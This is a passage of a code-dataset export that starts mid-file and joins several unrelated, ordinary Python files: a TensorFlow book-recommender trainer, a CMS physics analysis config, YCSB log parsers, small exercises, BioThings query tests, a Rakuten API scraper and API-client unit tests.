tf.nn.relu(tf.layers.batch_normalization(layer))\n tf.summary.histogram(\"activations\", activations)\n\n with tf.name_scope(\"layer3\"):\n W = weight_variable([512, book_embedding_size])\n b = bias_variable([book_embedding_size])\n tf.summary.histogram(\"W\", W)\n tf.summary.histogram(\"b\", b)\n layer = tf.matmul(layer, W) + b\n tf.summary.histogram(\"layer\", layer)\n userVec = tf.nn.relu(tf.layers.batch_normalization(layer),name=\"userVec\")\n tf.summary.histogram(\"activations\", activations)\n\n # Construct the variables for the NCE loss\n with tf.device('/cpu:0'):\n with tf.name_scope(\"nce\"):\n nce_weights = tf.Variable(\n tf.truncated_normal([book_size, book_embedding_size],\n stddev=1.0 / math.sqrt(book_embedding_size)),name=\"nce_weights\")\n nce_biases = tf.Variable(tf.zeros([book_size]),name=\"nce_biases\")\n tf.summary.histogram(\"nce_weights\",nce_weights)\n tf.summary.histogram(\"nce_biases\", nce_biases)\n\n # Compute the average NCE loss for the batch.\n # tf.nce_loss automatically draws a new sample of the negative labels each\n # time we evaluate the loss.\n loss = tf.reduce_mean(\n tf.nn.nce_loss(weights=nce_weights,\n biases=nce_biases,\n labels=labels,\n inputs=userVec,\n num_sampled=num_sampled,\n num_classes=book_size))\n\n tf.summary.scalar('loss', loss)\n # Construct the SGD optimizer using a learning rate of 1.0.\n optimizer = tf.train.GradientDescentOptimizer(rate).minimize(loss)\n\n logits = tf.matmul(userVec, tf.transpose(nce_weights))\n logits = tf.nn.bias_add(logits, nce_biases,name=\"logits\")\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.squeeze(labels))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n tf.summary.scalar('accuracy', accuracy)\n # labels_one_hot = tf.one_hot(tf.squeeze(labels), book_size)\n # total_loss = tf.nn.sigmoid_cross_entropy_with_logits(\n # labels=labels_one_hot,\n # logits=logits)\n # total_loss = tf.reduce_sum(total_loss)\n total_loss = loss\n\n tf.summary.scalar('total_loss', total_loss)\n top_5 = tf.nn.in_top_k(logits,tf.squeeze(labels),5)\n top_5_accuracy = tf.reduce_mean(tf.cast(top_5, \"float\"))\n tf.summary.scalar('top_5_accuracy', top_5_accuracy)\n top_100 = tf.nn.in_top_k(logits, tf.squeeze(labels), 100)\n top_100_accuracy = tf.reduce_mean(tf.cast(top_100, \"float\"))\n tf.summary.scalar('top_100_accuracy', top_100_accuracy)\n\n # norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))\n # normalized_embeddings = embeddings / norm\n # similarity = tf.matmul(userVec, normalized_embeddings, transpose_b=True)\n #\n # logits_vec = tf.nn.embedding_lookup(normalized_embeddings,tf.argmax(logits, 1))\n #\n # sims = tf.reduce_mean(tf.reduce_sum(tf.multiply(userVec,logits_vec),axis=1))\n merged = tf.summary.merge_all()\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n # Step 5: Begin training.\n num_steps = 200001\n with tf.Session(graph=graph) as session:\n init.run()\n print('Initialized')\n #加载训练过的模型接着训练\n # ckpt = tf.train.get_checkpoint_state(FLAGS.checkpointDir)\n # if ckpt and ckpt.model_checkpoint_path:\n # print('restore %s' % ckpt.model_checkpoint_path)\n # saver.restore(session, ckpt.model_checkpoint_path)\n\n train_writer = tf.summary.FileWriter(FLAGS.summaryDir + 'train_'+version,session.graph)\n average_loss = 0\n for step in range(num_steps):\n batch_search, batch_bookid, batch_packages, batch_labels,batch_booktags,batch_bookmarks = generate_batch(datas,30, batch_size)\n feed_dict = {bookids: batch_bookid,searchs: batch_search,packages: batch_packages, labels: batch_labels,booktags:batch_booktags,bookmarks:batch_bookmarks}\n _, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)\n average_loss += loss_val\n if step % 1000 == 0:\n if step > 0:\n average_loss /= 1000\n print(\"book_embeddings_sum\",book_embeddings_sum.eval())\n test_batch_search, test_batch_bookid, test_batch_package, test_batch_labels,test_batch_booktags,test_batch_bookmarks = generate_batch(test_datas,30,batch_size)\n test_feed_dict = {bookids: test_batch_bookid,searchs: test_batch_search,packages: test_batch_package, labels: test_batch_labels,booktags:test_batch_booktags,bookmarks:test_batch_bookmarks}\n print(time.strftime('%Y%m%d %H:%M:%S',time.localtime(time.time()))+' Train Average loss at step ', step, ': ', average_loss,\"accuracy:\",accuracy.eval(feed_dict)\n ,\"total_loss:\",total_loss.eval(feed_dict)\n , \"top5\",top_5_accuracy.eval(feed_dict),\"top100\",top_100_accuracy.eval(feed_dict))\n summary = merged.eval(feed_dict)\n train_writer.add_summary(summary, step)\n # print(\"Test test_accuracy\",accuracy.eval(test_feed_dict),\"test_total_loss:\", total_loss.eval(test_feed_dict)\n # , \"top5\",top_5_accuracy.eval(test_feed_dict),\"top100\",top_100_accuracy.eval(test_feed_dict))\n average_loss = 0\n if step > 1 and step % 10000 == 0:\n #保存模型\n saver.save(session, FLAGS.checkpointDir + 'model.ckpt', global_step=step + 1)\n\n return nce_weights.eval()\n\ndef vec2Features(vec):\n return dict(zip([str(h) for h in range(len(vec))], vec))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--buckets', type=str, default='/Users/liuyang/ml/data/userlogv3/',\n help='input data path')\n parser.add_argument('--summaryDir', type=str, default='/Users/liuyang/ml/data/userlogv3/',\n help='input data path')\n parser.add_argument('--checkpointDir', type=str, default='/tmp/userlogv3/',\n help='checkpoint data path')\n parser.add_argument('--eval', type=str, default=False,\n help='is eval')\n parser.add_argument('--evalInputs', type=str, default=\"1,2,3\",\n help='evalInputs')\n FLAGS, _ = parser.parse_known_args()\n\n batch_size = 512\n num_sampled = 128\n\n datas, test_datas=build_dataset()\n\n # print(len(datas['searchs']), datas['searchs'][:10])\n # print(len(datas['bookids']), datas['bookids'][:10])\n # print(len(datas['packages']), datas['packages'][:10])\n\n # a = [0.01,0.008,0.005,0.003,0.001,0.0001]\n # for i in a:\n # rate = i\n # version = \"rate_%s\" % rate\n # print(\"reversion:\"+version)\n bookVecs=train(datas,test_datas,\n 100000, 100000, 30,\n 256, 256, 8,\n batch_size, num_sampled)\n\n simHashs = []\n t = time.time()\n for i in range(len(bookVecs)):\n bookVec = bookVecs[i]\n simHashs.append(Simhash(vec2Features(bookVec), f=32).value)\n # simHashindex.add(str(i),)\n if i % 1000 == 0:\n print(\"build simIndex : %s , time:%s\" % (i / len(bookVecs), time.time() - t))\n t = time.time()\n with tf.gfile.FastGFile(FLAGS.summaryDir + simhash_path, 'w') as f:\n f.write(\",\".join(simHashs))\n\n\n","sub_path":"huaben/bookrecommend/ItemMatchV2.py","file_name":"ItemMatchV2.py","file_ext":"py","file_size_in_byte":25491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237866530","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\nimport FWCore.PythonUtilities.LumiList as LumiList\nimport FWCore.ParameterSet.Types as CfgTypes\nimport os \n\nrelBase = os.environ['CMSSW_BASE']\n\n\n#Work with data (if False, assumed MC simulations)\n#This needs to be in agreement with the input files/datasets below.\nisData = True\ndoPat = False\n\nprocess = cms.Process(\"POET\")\n\n#Configure the framework messaging system\n#https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideMessageLogger\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = \"WARNING\"\nprocess.MessageLogger.categories.append(\"POET\")\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(\n limit=cms.untracked.int32(-1))\nprocess.options = cms.untracked.PSet(wantSummary=cms.untracked.bool(True))\n\n#Select the maximum number of events to process (if -1, run over all events)\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\n\n#Load needed configuration\nprocess.load(\"Configuration.Geometry.GeometryIdeal_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\n\n#Define the source files to be read using the xrootd protocol (root://), or local files (file:)\n#Several files can be comma-separated\n#A local file, for testing, can be downloaded using, e.g., the cern open data client (https://cernopendata-client.readthedocs.io/en/latest/):\n# python cernopendata-client download-files --recid 6004 --filter-range 1-1\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n #'root://eospublic.cern.ch//eos/opendata/cms/Run2012B/DoubleMuParked/AOD/22Jan2013-v1/10000/1EC938EF-ABEC-E211-94E0-90E6BA442F24.root'\n #'file:/playground/1EC938EF-ABEC-E211-94E0-90E6BA442F24.root'\n 'root://eospublic.cern.ch//eos/opendata/cms/MonteCarlo2012/Summer12_DR53X/TTbar_8TeV-Madspin_aMCatNLO-herwig/AODSIM/PU_S10_START53_V19-v2/00000/000A9D3F-CE4C-E311-84F8-001E673969D2.root' \n )\n)\n\n#Alternatively, to run on larger scale, one could use index files as obtained from the Cern Open Data Portal\n#files = FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_10000_file_index.txt\")\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_20000_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_20001_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_20002_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_210000_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_30000_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_310000_file_index.txt\"))\n#process.source = cms.Source(\n# \"PoolSource\", fileNames=cms.untracked.vstring(*files))\n\n\n\n#These two lines are needed if you require access to the conditions database. E.g., to get jet energy corrections, trigger prescales, etc.\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nprocess.load('Configuration.StandardSequences.Services_cff')\n#Uncomment and arrange a line like this if you are getting access to the conditions database through CVMFS snapshot files (requires installing CVMFS client)\n#process.GlobalTag.connect = cms.string('sqlite_file:/cvmfs/cms-opendata-conddb.cern.ch/FT_53_LV5_AN1_RUNA.db')\n#The global tag must correspond to the needed epoch (comment out if no conditions needed)\nif isData: process.GlobalTag.globaltag = 'FT53_V21A_AN6::All'\nelse: process.GlobalTag.globaltag = \"START53_V27::All\"\n\nif isData:\n\t# Apply JSON file with lumi mask for data quality purposes (needs to be done after the process.source definition)\n\tgoodJSON = \"data/Cert_190456-208686_8TeV_22Jan2013ReReco_Collisions12_JSON.txt\"\n\tmyLumis = LumiList.LumiList(filename=goodJSON).getCMSSWString().split(\",\")\n\tprocess.source.lumisToProcess = CfgTypes.untracked(\n\t \tCfgTypes.VLuminosityBlockRange())\n\tprocess.source.lumisToProcess.extend(myLumis)\n\n\n#More information about InputCollections at https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideRecoDataTable\nprocess.myevents = cms.EDAnalyzer('EventAnalyzer')\t \nprocess.myelectrons = cms.EDAnalyzer('ElectronAnalyzer',\n\t\t\t\t InputCollection = cms.InputTag(\"gsfElectrons\")\n\t\t\t\t )\nprocess.mymuons = cms.EDAnalyzer('MuonAnalyzer',\n\t\t\t\t InputCollection = cms.InputTag(\"muons\")\n\t\t\t\t )\nprocess.myphotons = cms.EDAnalyzer('PhotonAnalyzer',\n InputCollection = cms.InputTag(\"photons\")\n )\n#Path Strings: These correspond to the Global Tag. Run jec_cfg.py first to get .txt files\nJecString = 'START53_V27_'\nif isData: JecString = 'FT53_V21A_AN6_'\n\nif doPat:\n # Load PAT configs and build some light sequences\n process.load('PhysicsTools.PatAlgos.producersLayer1.jetProducer_cff')\n process.load('PhysicsTools.PatAlgos.producersLayer1.metProducer_cff')\n process.load('PhysicsTools.PatAlgos.selectionLayer1.jetSelector_cfi')\n process.patCandidates = cms.Sequence(process.makePatJets+process.makePatMETs)\n process.selectedPatCandidates = cms.Sequence(process.selectedPatJets)\n process.patDefaultSequence = cms.Sequence(process.patCandidates * process.selectedPatCandidates)\n process.load('RecoJets.Configuration.RecoPFJets_cff')\n from PhysicsTools.PatAlgos.tools.jetTools import addJetCollection, runBTagging\n from PhysicsTools.PatAlgos.tools.coreTools import runOnData\n jetcorrlabels = ['L1FastJet','L2Relative','L3Absolute']\n if isData:\n runOnData(process, ['Jets','METs'], \"\", None, [])\n jetcorrlabels.append('L2L3Residual')\n # Set up the new jet collection\n process.ak5PFJets.doAreaFastjet = True\n addJetCollection(process,cms.InputTag('ak5PFJets'),\n \t'AK5', 'PFCorr',\n \tdoJTA = True,\n\tdoBTagging = True,\n\tjetCorrLabel = ('AK5PF', cms.vstring(jetcorrlabels)),\n\tdoType1MET = True,\n\tdoL1Cleaning = False,\n\tdoL1Counters = False,\n\tdoJetID = True,\n\tjetIdLabel = \"ak5\",\n\t) \n \n process.myjets= cms.EDAnalyzer('PatJetAnalyzer',\n\t\t\t\t InputCollection = cms.InputTag(\"selectedPatJetsAK5PFCorr\"),\n isData = cms.bool(isData),\n jecUncName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'Uncertainty_AK5PF.txt'), \n jerResName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/JetResolutionInputAK5PF.txt') \n )\nelse:\n from PhysicsTools.JetMCAlgos.HadronAndPartonSelector_cfi import selectedHadronsAndPartons\n process.selectedHadronsAndPartons = selectedHadronsAndPartons.clone()\n from PhysicsTools.JetMCAlgos.AK5PFJetsMCFlavourInfos_cfi import ak5JetFlavourInfos\n process.jetFlavourInfosAK5PFJets = ak5JetFlavourInfos.clone()\n process.myjets= cms.EDAnalyzer('JetAnalyzer',\n InputCollection = cms.InputTag(\"ak5PFJets\"),\n isData = cms.bool(isData),\n jecL1Name = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L1FastJet_AK5PF.txt'), \n jecL2Name = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L2Relative_AK5PF.txt'), #Don't forget to run jec_cfg.py\n jecL3Name = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L3Absolute_AK5PF.txt'), #to get these .txt files :)\n jecResName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L2L3Residual_AK5PF.txt'),\n jecUncName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'Uncertainty_AK5PF.txt'),\n jerResName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/JetResolutionInputAK5PF.txt')\n )\n\nprocess.mymets= cms.EDAnalyzer('MetAnalyzer',\n InputCollection = cms.InputTag(\"pfMet\")\n )\nprocess.mytaus = cms.EDAnalyzer('TauAnalyzer',\n InputCollection = cms.InputTag(\"hpsPFTauProducer\")\n )\nprocess.mytrigEvent = cms.EDAnalyzer('TriggObjectAnalyzer',\n filterName = cms.string(\"hltSingleJet190Regional\"),\n )\n\nprocess.mypvertex = cms.EDAnalyzer('VertexAnalyzer')\nprocess.mytracks= cms.EDAnalyzer('TrackAnalyzer')\nprocess.mygenparticle= cms.EDAnalyzer('GenParticleAnalyzer',\n\t\t\t#collect particles with specific pdgid:status\n\t\t\t#if 0:0, collect them all\t\n\t\t\tinput_particle = cms.vstring(\"1:11\",\"1:13\",\"1:22\",\"2:15\")\n\t\t\t)\n\nprocess.TFileService = cms.Service(\n \"TFileService\", fileName=cms.string(\"myoutput.root\"))\n\nif doPat:\n\tprocess.p = cms.Path(process.patDefaultSequence+process.myevents+process.myelectrons+process.mymuons+process.myphotons+process.myjets+process.mymets+process.mytaus+process.mytrigEvent)\nelse: process.p = cms.Path(process.selectedHadronsAndPartons * process.jetFlavourInfosAK5PFJets * process.myevents+process.myelectrons+process.mymuons+process.myphotons+process.myjets+process.mymets+process.mytaus+process.mytrigEvent)\n","sub_path":"PhysObjectExtractor/python/poet_cfg.py","file_name":"poet_cfg.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198095683","text":"from os import walk\nfrom markovchain import JsonStorage\nfrom markovchain.text import MarkovText, ReplyMode\nimport random\n\nmarkov = MarkovText()\n\npeople = ['Marnie', 'Gaz', 'Chloe', 'Nathan', 'Greg']\nlines = []\nfiles = []\nfor (dirpath, dirnames, filenames) in walk(\"scripts/\"):\n files.extend(filenames)\n break\n\nfor file in files:\n fo = open(f\"scripts/{file}\", \"r\")\n line = fo.readline()\n while line:\n lines.append(line)\n line = fo.readline()\n fo.close()\n\nfor line in lines:\n markov.data(line)\n\nfor i in range(0,20):\n print(f'{people[random.randrange(0, len(people), 1)]}:{markov(max_length=16, reply_mode=ReplyMode.END)}')\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"425214138","text":"#!/usr/bin/python\nimport argparse\nimport logging\nimport joblib\nimport os\n\nfrom pytools.ycsb.ycsb import PARSED_FILE_EXTENSION, load_ycsb_parsed_2_df, \\\n convert_df_column_ms2datetime, load_ycsb_raw_2_df, skip_df_head\n\nlogging.basicConfig(\n format=\"(%(funcName).10s):[%(lineno)4d] %(asctime)s %(levelname)7s| %(message)s\",\n datefmt='%H:%M:%S', level=logging.DEBUG)\n\n\ndef get_parsed_ycsb_df(src_file_name, is_input_preparsed, is_consider_siblings):\n \"\"\" Function returns a parsed df from the ycsb\"\"\"\n\n if is_input_preparsed:\n logging.info(\"Input set as 'pre-parsed', reading parsed...\")\n return load_ycsb_parsed_2_df(src_file_name)\n\n if is_consider_siblings:\n siblings_name = \"%s.%s\" % (src_file_name, PARSED_FILE_EXTENSION)\n if os.path.isfile(siblings_name):\n logging.info(\"Found sibling [%s] reading it as parsed...\", siblings_name)\n return load_ycsb_parsed_2_df(siblings_name)\n\n logging.info(\"Reading & parsing [%s] ...\", src_file_name)\n return load_ycsb_raw_2_df(src_file_name)\n\n\n\ndef _parse_ycsb_single_file(\n src_file, is_input_preparsed, skip_first_samples_min, is_consider_siblings):\n\n # <1.> get parsed dataframe\n df = get_parsed_ycsb_df(src_file, is_input_preparsed, is_consider_siblings)\n\n\n # <2.> convert timestamp column\n logging.info(\"Converting timestamp to date time format...[%s]\", src_file)\n df = convert_df_column_ms2datetime(df, \"timestamp_ms\", \"datetimestamp\")\n\n\n # <3.> skip head of the dataframe if needed\n if skip_first_samples_min > 0:\n df = skip_df_head(df, skip_first_samples_min, timestamp_column=\"datetimestamp\")\n\n return df\n\ndef parse_ycsb_file_list(\n file_list, is_input_preparsed, skip_first_samples_min, is_consider_siblings, n_jobs=-1):\n\n tasks = (\n joblib.delayed(_parse_ycsb_single_file)(\n src_file, is_input_preparsed, skip_first_samples_min, is_consider_siblings)\n for src_file in file_list\n )\n return joblib.Parallel(n_jobs=n_jobs, verbose=50)(tasks)\n\n\ndef get_default_arguments():\n\n parser = argparse.ArgumentParser(add_help=False)\n\n parser.add_argument(\"--skip_first_samples_min\", default=0, type=int,\n help=\"Option to skip front samples, that can be associated with warm up time.\")\n\n parser.add_argument(\"--target_latency_slo_us\", default=30000, type=int,\n help=\"If set, will compute SLO violations per file and add it into the title\")\n\n parser.add_argument('--pre_parsed_input', action='store_true', default=False,\n help=\"\"\"Indicates that the input files (.ycsb or any other extension) are already pre-parsed\n and can be read directly into a dataframe without additional Raw parsing procedure\"\"\")\n\n\n parser.add_argument('--consider_siblings',\n help=\"\"\"If a target file, has a sibling with \".%s\" extension, the script will use the\n sibling file and will consider it as it is already parsed. Note, skip_first_samples_min is\n not applied in this case\"\"\" % PARSED_FILE_EXTENSION , action='store_true')\n\n\n return parser\n\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser = argparse.ArgumentParser(\"\"\"Reads a list of .ycsb files and parses them in accordance\n to the configuration\"\"\",\n parents=[ycsb.get_default_arguments()],\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n FLAGS = parser.parse_args()\n file_list = ycsb.get_source_files(FLAGS, flatten=True)\n\n parse_ycsb_file_list(\n file_list, FLAGS.pre_parsed_input, FLAGS.skip_first_samples_min, FLAGS.consider_siblings,\n n_jobs=-1)\n","sub_path":"Phase_2/pytools-master/ycsb/parsing/parse_ycsb_file_list.py","file_name":"parse_ycsb_file_list.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573496677","text":"gifts = [\n (\"Partridge in a Pear Tree.\", \"and a\"),\n (\"Turtle Doves\", \"two\"),\n (\"French Hens\", \"three\"),\n (\"Calling Birds\", \"four\"),\n (\"Gold Rings\", \"five\"),\n (\"Geese-a-Laying\", \"six\"),\n (\"Swans-a-Swimming\", \"seven\"),\n (\"Maids-a-Milking\", \"eight\"),\n (\"Ladies Dancing\", \"nine\"),\n (\"Lords-a-Leaping\", \"ten\"),\n (\"Pipers Piping\", \"eleven\"),\n (\"Drummers Drumming\", \"twelve\")\n]\nnum_in_word = (\"first\", \"second\", \"third\", \"fourth\", \"fifth\", \"sixth\",\n\"seventh\", \"eighth\", \"ninth\", \"tenth\", \"eleventh\", \"twelfth\")\n\ndef sing():\n return verses(1, 12)\n \ndef verse(num):\n if num == 1:\n verse = on_the_nth_day(0) + \", a \" + gifts[0][0] + \"\\n\" \n return verse\n return _verse(num) + \"\\n\"\n\ndef verses(start,end):\n return \"\\n\".join([verse(n) for n in range(start,end+1)]) + \"\\n\"\n\ndef _verse(end):\n verse = on_the_nth_day(end - 1)\n bag = [verse,]\n end = end - 1\n for gift in gifts[end::-1]:\n bag.append(gift[1] + \" \" + gift[0])\n return \", \".join(bag)\n\ndef on_the_nth_day(n):\n return \"On the \" + num_in_word[n] + \" day of Christmas my true love gave to me\"\n","sub_path":"all_data/exercism_data/python/twelve-days/1cd8538dee7c463eb3490541a6f5bced.py","file_name":"1cd8538dee7c463eb3490541a6f5bced.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"374739790","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 2 13:18:45 2021\r\n\r\n@author: BHUVI\r\n\"\"\"\r\n\r\nimport numpy as np\r\nsome_dict = {'a': 1, 'b': 2, 'c': 3}\r\nfor key in some_dict:\r\n print(key)\r\n ","sub_path":"python/numpy_iterable.py","file_name":"numpy_iterable.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"242914087","text":"\"\"\"\nTests for initial changes to SEQD.query Function\n\"\"\"\n\nfrom biothings_explorer.user_query_dispatcher import SingleEdgeQueryDispatcher\nimport unittest\n\nclass TestSEQD(unittest.TestCase):\n\n # test filter by node degrees\n def test_node_deg(self):\n filter = {'name':'NodeDegree', 'count':30}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 31)\n for node,y in seqd.G.nodes(data=True):\n if node != 'NCBIGene:1017':\n self.assertEqual('NodeDegree', y['filteredBy'])\n\n # test filter by apis\n def test_api(self):\n filter = {'name':'UniqueAPIs'}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n for node,y in seqd.G.nodes(data=True):\n if node != 'NCBIGene:1017':\n self.assertEqual('UniqueAPIs', y['filteredBy'])\n\n # test filter by CoOccurrence\n def test_co_occur(self):\n filter = {'name':'CoOccurrence', 'count':60}\n seqd = SingleEdgeQueryDispatcher(input_cls='Disease',\n output_cls='Disease',\n input_id='MESH',\n values='D000755',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 61)\n for node,y in seqd.G.nodes(data=True):\n if node != 'MESH:D000755':\n self.assertEqual('CoOccurrence', y['filteredBy'])\n\n # test with labels\n def test_label_T(self):\n filter = {'name':'EdgeLabel', 'count':60, 'label':'related_to'}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 61)\n for x in seqd.G.edges.data():\n self.assertEqual(filter['label'], x[2]['label'])\n\n # with no label given\n def test_label_F(self):\n filter = {'name':'EdgeLabel', 'count':60}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 859)\n\n # test no filter given\n def test_no_filter(self):\n filter = {}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 859)\n\n # test with no count given (default to 50)\n def test_no_count(self):\n filter = {'name':'NodeDegree'}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 51)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_filters/test_seqd.py","file_name":"test_seqd.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"480753987","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport json\n\n# Calling API\n\ndriver = webdriver.PhantomJS() # without UI\n#driver = webdriver.Firefox() # with UI\n\nurls = [\n \"https://app.rakuten.co.jp/services/api/Product/Search/20140305?applicationId=1046974398995068359&format=json&keyword=4549387740759\",\n \"https://app.rakuten.co.jp/services/api/Product/Search/20140305?applicationId=1046974398995068359&format=json&keyword=24M45VQ-B\"\n]\n\nfor url in urls:\n driver.get(url)\n\n data = driver.page_source\n\n # http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser\n # lxml is faster than html.parser\n #parsed = BeautifulSoup(data, \"html.parser\")\n parsed = BeautifulSoup(data, \"lxml\")\n\n # String to Dictionary\n data_json = json.loads(parsed.get_text())\n print(data_json.__class__)\n print(data_json)\n","sub_path":"data/python/multiple_calls_api.py","file_name":"multiple_calls_api.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"173048653","text":"# Orange || Apple\nfrom sklearn import tree\n\n# [weight(g), texture(Bumpy/Smooth)] \n\nfeatures = [[140,1],[130,1],[150,0],[170,0]]\nlabels \t = [0, 0, 1, 1]\n\n# features + labels = training set\n\nclf = tree.DecisionTreeClassifier() # create new DecisionTree\n\nclf = clf.fit(features, labels) # train the model using the training set\n\n\nif clf.predict([[150,0]]) == 0 : # predict the best answer\n\tprint(\"Apple!\")\nelse:\n\tprint(\"Orange!\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"623090716","text":"import httpretty\nimport json\nimport unittest\n\nfrom unittest import TestCase\n\nfrom pir_client.client import pir_api_client, InvalidChoice\n\n\nOPTIONS_DATA = {\n \"actions\": {\n \"POST\": {\n \"country\": {\n \"choices\": [\n {\n \"value\": \"AF\",\n \"display_name\": \"Afghanistan\"\n },\n ]\n },\n\n \"market\": {\n \"choices\": [\n {\n \"value\": \"africa\",\n \"display_name\": \"africa\"\n },\n {\n \"value\": \"canada\",\n \"display_name\": \"canada\"\n }\n ]\n },\n \"sector\": {\n \"choices\": [\n {\n \"value\": \"tech\",\n \"display_name\": \"Technology\"\n },\n {\n \"value\": \"automotive\",\n \"display_name\": \"Automotive\"\n },\n ]\n }\n }\n }\n}\n\n\nclass APIClientTestCase(TestCase):\n def setUp(self):\n httpretty.enable()\n httpretty.register_uri(\n httpretty.OPTIONS, \"http://none/api/pir/\",\n body=json.dumps(OPTIONS_DATA)\n )\n\n httpretty.register_uri(\n httpretty.POST, \"http://none/api/pir/\",\n )\n\n def tearDown(self):\n httpretty.disable()\n\n def test_post(self):\n\n res = pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'market': 'africa',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n self.assertIsInstance(res, object)\n\n with self.assertRaises(InvalidChoice):\n pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'market': 'not a market',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n with self.assertRaises(InvalidChoice):\n pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'country': 'not a country',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n with self.assertRaises(InvalidChoice):\n pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'country': 'AF',\n 'market': 'africa',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n\nif __name__ == '__main__':\n 